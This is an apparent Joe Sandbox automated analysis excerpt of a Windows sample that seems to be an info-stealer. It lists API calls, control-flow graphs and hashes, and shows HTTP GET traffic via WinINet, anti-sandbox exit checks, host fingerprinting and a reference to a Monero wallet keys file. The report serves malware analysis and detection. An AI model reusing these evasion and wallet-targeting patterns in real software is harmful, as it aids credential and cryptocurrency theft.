                          • GetProcAddress.KERNEL32(76310000,00825428), ref: 00DFA314
                          • GetProcAddress.KERNEL32(76310000,0082A720), ref: 00DFA32C
                          • GetProcAddress.KERNEL32(76910000,0083EF98), ref: 00DFA352
                          • GetProcAddress.KERNEL32(76910000,00825468), ref: 00DFA36A
                          • GetProcAddress.KERNEL32(76910000,00838B48), ref: 00DFA382
                          • GetProcAddress.KERNEL32(76910000,0083EE60), ref: 00DFA39B
                          • GetProcAddress.KERNEL32(76910000,0083EE78), ref: 00DFA3B3
                          • GetProcAddress.KERNEL32(76910000,00825528), ref: 00DFA3CB
                          • GetProcAddress.KERNEL32(76910000,00825388), ref: 00DFA3E4
                          • GetProcAddress.KERNEL32(76910000,0083EF08), ref: 00DFA3FC
                          • GetProcAddress.KERNEL32(76910000,0083EF20), ref: 00DFA414
                          • GetProcAddress.KERNEL32(75B30000,00825448), ref: 00DFA436
                          • GetProcAddress.KERNEL32(75B30000,0083EE90), ref: 00DFA44E
                          • GetProcAddress.KERNEL32(75B30000,0083EF80), ref: 00DFA466
                          • GetProcAddress.KERNEL32(75B30000,0083EF38), ref: 00DFA47F
                          • GetProcAddress.KERNEL32(75B30000,0083EFB0), ref: 00DFA497
                          • GetProcAddress.KERNEL32(75670000,00825488), ref: 00DFA4B8
                          • GetProcAddress.KERNEL32(75670000,00825688), ref: 00DFA4D1
                          • GetProcAddress.KERNEL32(76AC0000,008254A8), ref: 00DFA4F2
                          • GetProcAddress.KERNEL32(76AC0000,0083EE00), ref: 00DFA50A
                          • GetProcAddress.KERNEL32(6F4E0000,008254C8), ref: 00DFA530
                          • GetProcAddress.KERNEL32(6F4E0000,00825628), ref: 00DFA548
                          • GetProcAddress.KERNEL32(6F4E0000,008255C8), ref: 00DFA560
                          • GetProcAddress.KERNEL32(6F4E0000,0083E8C0), ref: 00DFA579
                          • GetProcAddress.KERNEL32(6F4E0000,008255E8), ref: 00DFA591
                          • GetProcAddress.KERNEL32(6F4E0000,008254E8), ref: 00DFA5A9
                          • GetProcAddress.KERNEL32(6F4E0000,00825508), ref: 00DFA5C2
                          • GetProcAddress.KERNEL32(6F4E0000,008255A8), ref: 00DFA5DA
                          • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 00DFA5F1
                          • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 00DFA607
                          • GetProcAddress.KERNEL32(75AE0000,0083EA10), ref: 00DFA629
                          • GetProcAddress.KERNEL32(75AE0000,00838B18), ref: 00DFA641
                          • GetProcAddress.KERNEL32(75AE0000,0083EAD0), ref: 00DFA659
                          • GetProcAddress.KERNEL32(75AE0000,0083EA28), ref: 00DFA672
                          • GetProcAddress.KERNEL32(76300000,00825648), ref: 00DFA693
                          • GetProcAddress.KERNEL32(6FE20000,0083EAE8), ref: 00DFA6B4
                          • GetProcAddress.KERNEL32(6FE20000,00825348), ref: 00DFA6CD
                          • GetProcAddress.KERNEL32(6FE20000,0083E968), ref: 00DFA6E5
                          • GetProcAddress.KERNEL32(6FE20000,0083E9E0), ref: 00DFA6FD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: HttpQueryInfoA$InternetSetOptionA
                          • API String ID: 2238633743-1775429166
                          • Opcode ID: 8e9e0743910a3d33717a23bdabf3c96daf14cdd263b32ed0241b2c60cccd9770
                          • Instruction ID: 1c1396881dc5a29f1796552c325ceb53f4bb05f02d59090231888332d3f92d02
                          • Opcode Fuzzy Hash: 8e9e0743910a3d33717a23bdabf3c96daf14cdd263b32ed0241b2c60cccd9770
                          • Instruction Fuzzy Hash: 4062EBB5700200EFC774DFA8EA8895637F9F78C601734856AE68AC3A4CDE7F94419B64
                          Function 00DE6280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1033 de6280-de630b call dfa7a0 call de47b0 call dfa740 InternetOpenA StrCmpCA 1040 de630d 1033->1040 1041 de6314-de6318 1033->1041 1040->1041 1042 de631e-de6342 InternetConnectA 1041->1042 1043 de6509-de6525 call dfa7a0 call dfa800 * 2 1041->1043 1044 de64ff-de6503 InternetCloseHandle 1042->1044 1045 de6348-de634c 1042->1045 1063 de6528-de652d 1043->1063 1044->1043 1047 de634e-de6358 1045->1047 1048 de635a 1045->1048 1050 de6364-de6392 HttpOpenRequestA 1047->1050 1048->1050 1052 de6398-de639c 1050->1052 1053 de64f5-de64f9 InternetCloseHandle 1050->1053 1055 de639e-de63bf InternetSetOptionA 1052->1055 1056 de63c5-de6405 HttpSendRequestA HttpQueryInfoA 1052->1056 1053->1044 1055->1056 1058 de642c-de644b call df8940 1056->1058 1059 de6407-de6427 call dfa740 call dfa800 * 2 1056->1059 1066 de644d-de6454 1058->1066 1067 de64c9-de64e9 call dfa740 call dfa800 * 2 1058->1067 1059->1063 1069 de6456-de6480 InternetReadFile 1066->1069 1070 de64c7-de64ef InternetCloseHandle 1066->1070 1067->1063 1074 de648b 1069->1074 1075 de6482-de6489 1069->1075 1070->1053 1074->1070 1075->1074 1079 de648d-de64c5 call dfa9b0 call dfa8a0 call dfa800 1075->1079 1079->1069
                          APIs
                            • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                            • Part of subcall function 00DE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00DE4839
                            • Part of subcall function 00DE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00DE4849
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                          • InternetOpenA.WININET(00E00DFE,00000001,00000000,00000000,00000000), ref: 00DE62E1
                          • StrCmpCA.SHLWAPI(?,00840B30), ref: 00DE6303
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00DE6335
                          • HttpOpenRequestA.WININET(00000000,GET,?,00840030,00000000,00000000,00400100,00000000), ref: 00DE6385
                          • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00DE63BF
                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DE63D1
                          • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00DE63FD
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00DE646D
                          • InternetCloseHandle.WININET(00000000), ref: 00DE64EF
                          • InternetCloseHandle.WININET(00000000), ref: 00DE64F9
                          • InternetCloseHandle.WININET(00000000), ref: 00DE6503
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                          • String ID: ERROR$ERROR$GET
                          • API String ID: 3749127164-2509457195
                          • Opcode ID: 5dbca39a9fa2713259220d54424f2716dda93f29b04b5490c9a32137f210105f
                          • Instruction ID: c4e25dc5e626ccaaeef8ee908d7d73391957562af22dd71b523369095b4d0dfc
                          • Opcode Fuzzy Hash: 5dbca39a9fa2713259220d54424f2716dda93f29b04b5490c9a32137f210105f
                          • Instruction Fuzzy Hash: D0715C71A00218EBDB24EFA4CC49BEE7774FB44700F108199F20A6B5C4DBB5AA85CF61
                          Function 00DF5510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1090 df5510-df5577 call df5ad0 call dfa820 * 3 call dfa740 * 4 1106 df557c-df5583 1090->1106 1107 df55d7-df564c call dfa740 * 2 call de1590 call df52c0 call dfa8a0 call dfa800 call dfaad0 StrCmpCA 1106->1107 1108 df5585-df55b6 call dfa820 call dfa7a0 call de1590 call df51f0 1106->1108 1134 df5693-df56a9 call dfaad0 StrCmpCA 1107->1134 1138 df564e-df568e call dfa7a0 call de1590 call df51f0 call dfa8a0 call dfa800 1107->1138 1124 df55bb-df55d2 call dfa8a0 call dfa800 1108->1124 1124->1134 1139 df56af-df56b6 1134->1139 1140 df57dc-df5844 call dfa8a0 call dfa820 * 2 call de1670 call dfa800 * 4 call df6560 call de1550 1134->1140 1138->1134 1143 df56bc-df56c3 1139->1143 1144 df57da-df585f call dfaad0 StrCmpCA 1139->1144 1270 df5ac3-df5ac6 1140->1270 1148 df571e-df5793 call dfa740 * 2 call de1590 call df52c0 call dfa8a0 call dfa800 call dfaad0 StrCmpCA 1143->1148 1149 df56c5-df5719 call dfa820 call dfa7a0 call de1590 call df51f0 call dfa8a0 call dfa800 1143->1149 1163 df5865-df586c 1144->1163 1164 df5991-df59f9 call dfa8a0 call dfa820 * 2 call de1670 call dfa800 * 4 call df6560 call de1550 1144->1164 1148->1144 1249 df5795-df57d5 call dfa7a0 call de1590 call df51f0 call dfa8a0 call dfa800 1148->1249 1149->1144 1170 df598f-df5a14 call dfaad0 StrCmpCA 1163->1170 1171 df5872-df5879 1163->1171 1164->1270 1200 df5a28-df5a91 call dfa8a0 call dfa820 * 2 call de1670 call dfa800 * 4 call df6560 call de1550 1170->1200 1201 df5a16-df5a21 Sleep 1170->1201 1179 df587b-df58ce call dfa820 call dfa7a0 call de1590 call df51f0 call dfa8a0 call dfa800 1171->1179 1180 df58d3-df5948 call dfa740 * 2 call de1590 call df52c0 call dfa8a0 call dfa800 call dfaad0 StrCmpCA 1171->1180 1179->1170 1180->1170 1275 df594a-df598a call dfa7a0 call de1590 call df51f0 call dfa8a0 call dfa800 1180->1275 1200->1270 1201->1106 1249->1144 1275->1170
                          APIs
                            • Part of subcall function 00DFA820: lstrlen.KERNEL32(00DE4F05,?,?,00DE4F05,00E00DDE), ref: 00DFA82B
                            • Part of subcall function 00DFA820: lstrcpy.KERNEL32(00E00DDE,00000000), ref: 00DFA885
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00DF5644
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00DF56A1
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00DF5857
                            • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                            • Part of subcall function 00DF51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00DF5228
                            • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                            • Part of subcall function 00DF52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00DF5318
                            • Part of subcall function 00DF52C0: lstrlen.KERNEL32(00000000), ref: 00DF532F
                            • Part of subcall function 00DF52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00DF5364
                            • Part of subcall function 00DF52C0: lstrlen.KERNEL32(00000000), ref: 00DF5383
                            • Part of subcall function 00DF52C0: lstrlen.KERNEL32(00000000), ref: 00DF53AE
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00DF578B
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00DF5940
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00DF5A0C
                          • Sleep.KERNEL32(0000EA60), ref: 00DF5A1B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen$Sleep
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                          • API String ID: 507064821-2791005934
                          • Opcode ID: b712b122a781439edc6029e59d3e38e020eb6bc23938944723ff429ef7620f2c
                          • Instruction ID: 79af92956f0381449e2139ff272c78e3fc5ff461b28310a9926fea7baac6b2a0
                          • Opcode Fuzzy Hash: b712b122a781439edc6029e59d3e38e020eb6bc23938944723ff429ef7620f2c
                          • Instruction Fuzzy Hash: 73E152B1A1020C9ACB14FBA4E852EFD7378EF54340F51C118B64A67495EF75AB09CBB2
                          Function 00DF17A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1301 df17a0-df17cd call dfaad0 StrCmpCA 1304 df17cf-df17d1 ExitProcess 1301->1304 1305 df17d7-df17f1 call dfaad0 1301->1305 1309 df17f4-df17f8 1305->1309 1310 df17fe-df1811 1309->1310 1311 df19c2-df19cd call dfa800 1309->1311 1313 df199e-df19bd 1310->1313 1314 df1817-df181a 1310->1314 1313->1309 1316 df187f-df1890 StrCmpCA 1314->1316 1317 df185d-df186e StrCmpCA 1314->1317 1318 df1835-df1844 call dfa820 1314->1318 1319 df1913-df1924 StrCmpCA 1314->1319 1320 df1932-df1943 StrCmpCA 1314->1320 1321 df18f1-df1902 StrCmpCA 1314->1321 1322 df1951-df1962 StrCmpCA 1314->1322 1323 df1970-df1981 StrCmpCA 1314->1323 1324 df18cf-df18e0 StrCmpCA 1314->1324 1325 df198f-df1999 call dfa820 1314->1325 1326 df18ad-df18be StrCmpCA 1314->1326 1327 df1849-df1858 call dfa820 1314->1327 1328 df1821-df1830 call dfa820 1314->1328 1333 df189e-df18a1 1316->1333 1334 df1892-df189c 1316->1334 1331 df187a 1317->1331 1332 df1870-df1873 1317->1332 1318->1313 1341 df1926-df1929 1319->1341 1342 df1930 1319->1342 1343 df194f 1320->1343 1344 df1945-df1948 1320->1344 1339 df190e 1321->1339 1340 df1904-df1907 1321->1340 1345 df196e 1322->1345 1346 df1964-df1967 1322->1346 1348 df198d 1323->1348 1349 df1983-df1986 1323->1349 1337 df18ec 1324->1337 1338 df18e2-df18e5 1324->1338 1325->1313 1335 df18ca 1326->1335 1336 df18c0-df18c3 1326->1336 1327->1313 1328->1313 1331->1313 1332->1331 1353 df18a8 1333->1353 1334->1353 1335->1313 1336->1335 1337->1313 1338->1337 1339->1313 1340->1339 1341->1342 1342->1313 1343->1313 1344->1343 1345->1313 1346->1345 1348->1313 1349->1348 1353->1313
                          APIs
                          • StrCmpCA.SHLWAPI(00000000,block), ref: 00DF17C5
                          • ExitProcess.KERNEL32 ref: 00DF17D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: block
                          • API String ID: 621844428-2199623458
                          • Opcode ID: 84bc075d284ee0420306058730858058f0ff348d526df65b4e1f1408536975b6
                          • Instruction ID: 5b8a325d576877e94ab6bc33fe6af0b27c7cb99fa575ba624164c904f17d17c1
                          • Opcode Fuzzy Hash: 84bc075d284ee0420306058730858058f0ff348d526df65b4e1f1408536975b6
                          • Instruction Fuzzy Hash: DA5168B8A0020EEBCB14DFA0D994BBE77B5BF44304F118048E656A7280DBB5E941DBB1
                          Function 00DF7500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1356 df7500-df754a GetWindowsDirectoryA 1357 df754c 1356->1357 1358 df7553-df75c7 GetVolumeInformationA call df8d00 * 3 1356->1358 1357->1358 1365 df75d8-df75df 1358->1365 1366 df75fc-df7617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 df75e1-df75fa call df8d00 1365->1367 1369 df7619-df7626 call dfa740 1366->1369 1370 df7628-df7658 wsprintfA call dfa740 1366->1370 1367->1365 1377 df767e-df768e 1369->1377 1370->1377
                          APIs
                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00DF7542
                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00DF757F
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DF7603
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00DF760A
                          • wsprintfA.USER32 ref: 00DF7640
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                          • String ID: :$C$\$
                          • API String ID: 1544550907-3109660283
                          • Opcode ID: 7d4365eeb78933c8df5f8a52d880a949324614c7aa3465016a80854f3f623f26
                          • Instruction ID: cdabdd32e80fdc169ca3c38babd1a08124cef8cf971b5f57c8e4d8ff896cfc50
                          • Opcode Fuzzy Hash: 7d4365eeb78933c8df5f8a52d880a949324614c7aa3465016a80854f3f623f26
                          • Instruction Fuzzy Hash: 3A4161B1904248EBDB20DF94DC45BEEB7B4EF08704F144199F609A7284DB79AA44CBB5
                          Function 00DF69F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(76210000,00831650), ref: 00DF98A1
                            • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(76210000,00831638), ref: 00DF98BA
                            • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(76210000,00831668), ref: 00DF98D2
                            • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(76210000,00831698), ref: 00DF98EA
                            • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(76210000,00831728), ref: 00DF9903
                            • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(76210000,00838C48), ref: 00DF991B
                            • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(76210000,008250A8), ref: 00DF9933
                            • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(76210000,008250E8), ref: 00DF994C
                            • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(76210000,008316B0), ref: 00DF9964
                            • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(76210000,008316C8), ref: 00DF997C
                            • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(76210000,00831740), ref: 00DF9995
                            • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(76210000,00831758), ref: 00DF99AD
                            • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(76210000,00825068), ref: 00DF99C5
                            • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(76210000,008316E0), ref: 00DF99DE
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                            • Part of subcall function 00DE11D0: ExitProcess.KERNEL32 ref: 00DE1211
                            • Part of subcall function 00DE1160: GetSystemInfo.KERNEL32(?), ref: 00DE116A
                            • Part of subcall function 00DE1160: ExitProcess.KERNEL32 ref: 00DE117E
                            • Part of subcall function 00DE1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00DE112B
                            • Part of subcall function 00DE1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00DE1132
                            • Part of subcall function 00DE1110: ExitProcess.KERNEL32 ref: 00DE1143
                            • Part of subcall function 00DE1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00DE123E
                            • Part of subcall function 00DE1220: __aulldiv.LIBCMT ref: 00DE1258
                            • Part of subcall function 00DE1220: __aulldiv.LIBCMT ref: 00DE1266
                            • Part of subcall function 00DE1220: ExitProcess.KERNEL32 ref: 00DE1294
                            • Part of subcall function 00DF6770: GetUserDefaultLangID.KERNEL32 ref: 00DF6774
                            • Part of subcall function 00DE1190: ExitProcess.KERNEL32 ref: 00DE11C6
                            • Part of subcall function 00DF7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00DE11B7), ref: 00DF7880
                            • Part of subcall function 00DF7850: RtlAllocateHeap.NTDLL(00000000), ref: 00DF7887
                            • Part of subcall function 00DF7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00DF789F
                            • Part of subcall function 00DF78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DF7910
                            • Part of subcall function 00DF78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00DF7917
                            • Part of subcall function 00DF78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00DF792F
                            • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                            • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                            • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                            • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00838AE8,?,00E0110C,?,00000000,?,00E01110,?,00000000,00E00AEF), ref: 00DF6ACA
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00DF6AE8
                          • CloseHandle.KERNEL32(00000000), ref: 00DF6AF9
                          • Sleep.KERNEL32(00001770), ref: 00DF6B04
                          • CloseHandle.KERNEL32(?,00000000,?,00838AE8,?,00E0110C,?,00000000,?,00E01110,?,00000000,00E00AEF), ref: 00DF6B1A
                          • ExitProcess.KERNEL32 ref: 00DF6B22
                          Memory Dump Source
